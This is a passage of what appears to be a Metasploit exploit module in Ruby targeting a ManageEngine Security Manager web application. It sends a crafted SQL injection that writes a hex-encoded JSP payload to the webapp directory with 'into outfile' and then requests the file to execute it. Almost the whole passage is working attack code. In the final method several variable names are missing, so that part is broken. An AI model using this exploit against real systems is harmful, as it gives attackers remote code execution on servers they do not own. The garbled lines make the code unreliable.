                cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
                cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
                cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&'
                cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&'
                cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&'
                cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&'
                cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; '
                cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
                cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'

                state_id = Rex::Text.rand_text_numeric(5)

                send_request_cgi({
                        'method'    => 'POST',
                        'uri'       => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp",
                        'headers'   => {
                                'Cookie' => cookie,
                                'Accept-Encoding' => 'identity'
                        },
                        'vars_get'  => {
                                'reqType'    =>'AdvanceSearch',
                                'SUBREQUEST' =>'XMLHTTP'
                        },
                        'vars_post' => {
                                'ANDOR'       => 'and',
                                'condition_1' => 'OpenPorts',
                                'operator_1'  => 'IN',
                                'value_1'     => sqli_string,
                                'COUNT'       => '1'
                        }
                })
        end

        #
        # Run the actual exploit
        #
        # Writes the hex-encoded JSP to `out` through the injection ("into outfile"),
        # requests it by basename so the servlet container runs it, then hands off to
        # the payload handler.
        def inject_exec(out)
                hex_jsp = generate_jsp_payload
                rnd_num = Rex::Text.rand_text_numeric(1)
                sqli  = "#{rnd_num})) union select 0x#{hex_jsp},"
                sqli << (2..28).map {|e| e} * ","   # "2,3,...,28" — same join as in pick_target
                sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"

                print_status("#{rhost}:#{rport} - Trying SQL injection...")
                sqli_exec(sqli)

                fname = "/#{File.basename(out)}"
                print_status("#{rhost}:#{rport} - Requesting #{fname}")
                send_request_raw({'uri' => fname})

                handler
        end


        # Entry point: initialises the list of files to clean up, resolves the target
        # (bailing out when pick_target returns nil), then drops a randomly named .jsp
        # into the webapp directory and executes it. NOTE(review): the variable names
        # on the first two assignments are missing in this listing.
        def exploit
                # This is used to collect files we want to delete later
                 = []

                 = pick_target
                if .nil?
                        print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
                        return
                end

                jsp_name  = rand_text_alpha(rand(6)+3)
                outpath   = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}"

                 << outpath

                inject_exec(outpath)
        end
end